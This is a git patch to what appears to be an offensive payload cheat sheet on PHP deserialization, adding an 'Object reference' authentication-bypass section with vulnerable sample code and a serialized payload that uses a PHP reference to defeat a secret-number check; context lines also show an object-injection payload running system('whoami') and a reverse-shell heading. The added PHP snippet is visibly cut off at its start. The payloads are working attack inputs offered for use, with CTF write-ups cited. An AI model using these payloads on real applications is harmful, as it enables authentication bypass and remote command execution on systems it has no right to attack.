From 3cf806c8ff05a7eab547aa3eb7c1c5b12ceea6dd Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Wed, 26 Sep 2018 00:13:19 +0200
Subject: [PATCH] 2nd unserialize payload

---
 PHP serialization/README.md | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)

diff --git a/PHP serialization/README.md b/PHP serialization/README.md
index a0c1257..765d7b9 100644
--- a/PHP serialization/README.md
+++ b/PHP serialization/README.md
@@ -45,6 +45,8 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}
 
 ## Authentication bypass
 
+### Type juggling
+
 Vulnerable code:
 
 ```php
@@ -66,6 +68,40 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
 
 Because `true == "str"` is true.
 Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
+### Object reference
+
+Vulnerable code:
+
+```php
+secretCode = rand(500000,999999);
+ if($obj->guess === $obj->secretCode) {
+ echo "Win";
+ }
+}
+?>
+```
+
+Payload:
+
+```
+O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
+```
+
+Ref:
+
+- [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
+- [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
+
 ## Others exploits
 
 Reverse Shell
@@ -98,3 +134,4 @@ echo urlencode(serialize(new PHPObjectInjection));
 
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
 * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
+* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)